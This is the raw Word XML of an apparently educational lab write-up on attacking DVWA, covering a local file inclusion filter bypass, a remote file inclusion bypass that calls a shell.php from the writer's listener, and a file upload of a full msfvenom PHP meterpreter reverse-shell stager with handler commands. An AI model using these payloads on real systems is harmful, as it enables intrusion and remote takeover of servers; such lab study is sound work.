    <w:p w14:paraId="5D06787E" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C496C43" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CB352A" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C3322D" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E40F88" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438B1951" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C080DFD" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153F5695" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457938F9" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1B65EA" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382B539A" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF3A8BD" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E2FBF9" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E99CCC" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5565F104" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B81E82" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70689860" w14:textId="12F6661D" w:rsidR="00A578F2" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LFI medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA56529" w14:textId="34282F7A" w:rsidR="00A31CAB" w:rsidRPr="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">String replacers being used according to source code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>It will attempt to remove ../ or ..\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA8545" w14:textId="3610B2FB" w:rsidR="00A578F2" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2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39AF10C4" wp14:editId="711D8DE8">
            <wp:extent cx="4158532" cy="187378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3923" cy="18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A899" w14:textId="4D420032" w:rsidR="00AA7691" w:rsidRPr="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>To overcome this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>....//....//hackable/flags/fi.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. By adding the extra ../ it will leave me with </w:t>
      </w:r>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.../../hackable/flags/fi.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> which outputs the following; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A3DFB" w14:textId="6C175A8E" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2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56F9F105" wp14:editId="1462422E">
            <wp:extent cx="5731510" cy="3215005"/>
            <wp:effectExtent l="0" t="0" r="254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FE5" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4836081A" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B63A61" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6909936B" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76433104" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F45E9A" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2004A323" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4771AF1E" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5403B745" w14:textId="6F57FFF7" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE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 xml:space="preserve">RFI medium </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9AA41D" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRPr="00867068" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>$file = str_replace( array( "http://", "https://" ), "", $file );</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">shows that the code doesn’t acknowledge captial characters so I will attempt to change http to Http. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096C268" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13475D70" wp14:editId="33D84BC2">
            <wp:extent cx="5267325" cy="3000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C966" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRPr="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I set a nc listener with the port 9000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7420B" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE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0BDF228D" wp14:editId="0A3D433B">
            <wp:extent cx="4457700" cy="800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80BB" w14:textId="1A5BE75F" w:rsidR="00ED52EE" w:rsidRPr="00867068" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">I then executed as the source code didn’t </w:t>
      </w:r>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>acknowledge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> captial characters. </w:t>
      </w:r>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>http://10.0.2.15/dvwa/vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00222695" w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00867068">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>//10.0.2.15:9000/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F04C85" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRPr="00816A68" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B48F743" wp14:editId="6942B475">
            <wp:extent cx="5731510" cy="108585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9519"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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441D6" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Which provided me with a shell on my host machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E9F6F" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00ED52EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F11D4BB" wp14:editId="2A1AD6D0">
            <wp:extent cx="4457700" cy="800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E3B0" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D3CE04" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B490D0" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B2EA67" w14:textId="550E7A8D" w:rsidR="00AA7691" w:rsidRDefault="00AA7691" w:rsidP="00A578F2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File upload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD05F0" w14:textId="76468E4A" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">I set up msvenom with the following cmd; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDAAC4" w14:textId="45BA6F67" w:rsidR="00870BCD" w:rsidRPr="00ED52EE" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/</w:t>
      </w:r>
      <w:r w:rsidR="00222695" w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_tcp LPORT=4444 -f raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776997DA" w14:textId="589B0D32" w:rsidR="00A578F2" w:rsidRDefault="00AA7691" w:rsidP="00A578F2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29583C76" wp14:editId="7D7F156D">
            <wp:extent cx="6353680" cy="320992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0876" cy="32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0D2E" w14:textId="0AEC5B6F" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Which then gave me a php script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> which I saved to the file exploit.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480DF8F" w14:textId="7D1573D8" w:rsidR="00870BCD" w:rsidRPr="00ED52EE" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;?php /**/ error_reporting(0); $ip = '10.0.2.15'; $port = 4444; if (($f = 'stream_socket_client') &amp;&amp; is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s &amp;&amp; ($f = 'fsockopen') &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s &amp;&amp; ($f = 'socket_create') &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) &lt; $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') &amp;&amp; ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F38FB1" w14:textId="3B0A12DD" w:rsidR="00A578F2" w:rsidRDefault="00AA7691" w:rsidP="00A578F2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9CE1FD0" wp14:editId="55F9AF27">
            <wp:extent cx="6325789" cy="60195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242" cy="638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35E56" w14:textId="1BAE152B" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I then started msfconsole and used the multi handler by inputting;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006ED922" w14:textId="4965940C" w:rsidR="00870BCD" w:rsidRPr="00ED52EE" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf5 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED61A8" w14:textId="0EE0C1D4" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I also set the payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78AC6B" w14:textId="2DB0677D" w:rsidR="00870BCD" w:rsidRPr="00ED52EE" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf5 exploit(multi/handler) &gt; set payload php/</w:t>
      </w:r>
      <w:r w:rsidR="00222695" w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295690B0" w14:textId="02B66B7A" w:rsidR="00870BCD" w:rsidRPr="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">then set a </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">AND </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">and awaited on a connection from webserver. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC38C4" w14:textId="1F6F80B5" w:rsidR="00A578F2" w:rsidRDefault="00AA7691" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7691">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1F6131" wp14:editId="681597DA">
            <wp:extent cx="6019800" cy="2931868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28578" cy="29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528F" w14:textId="3E2593E4" w:rsidR="00870BCD" w:rsidRPr="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I created an exploit.php file which I uploaded to the DVWA server which showed It was successfull</w:t>
      </w:r>
      <w:r w:rsidR="006869B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">y uploaded to </w:t>
      </w:r>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>../../hackable/uploads/exploit.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A8B45" w14:textId="6A2C9132" w:rsidR="00A578F2" w:rsidRDefault="000205F7" w:rsidP="00A578F2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4E368174" wp14:editId="2328AAC8">
            <wp:extent cx="5731510" cy="31432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1250"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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B2380" w14:textId="6E1DB466" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049E912A" w14:textId="52339F25" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216D32B3" w14:textId="753EB1D9" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0139D436" w14:textId="5FAFC122" w:rsidR="00870BCD" w:rsidRDefault="00870BCD" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/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429BEA3E" wp14:editId="0FD45439">
            <wp:extent cx="5731510" cy="223266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188E" w14:textId="26924D43" w:rsidR="00870BCD" w:rsidRPr="00870BCD" w:rsidRDefault="00334C4C" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The webpage successfully uploaded my page. </w:t>
      </w:r>
      <w:r w:rsidR="00870BCD" w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">I ran that page which allowed a connection to my host machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DCE9F" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532CB401" w14:textId="3E7A598E" w:rsidR="00A578F2" w:rsidRPr="00870BCD" w:rsidRDefault="007427D2" w:rsidP="00870BCD">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870BCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E3AF5C5" wp14:editId="592AA7D9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1436370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2661285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="285288" cy="45719"/>
            <wp:effectExtent l="0" t="0" r="63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4" r="4387" b="17259"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="285288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5F7" w:rsidRPr="000205F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
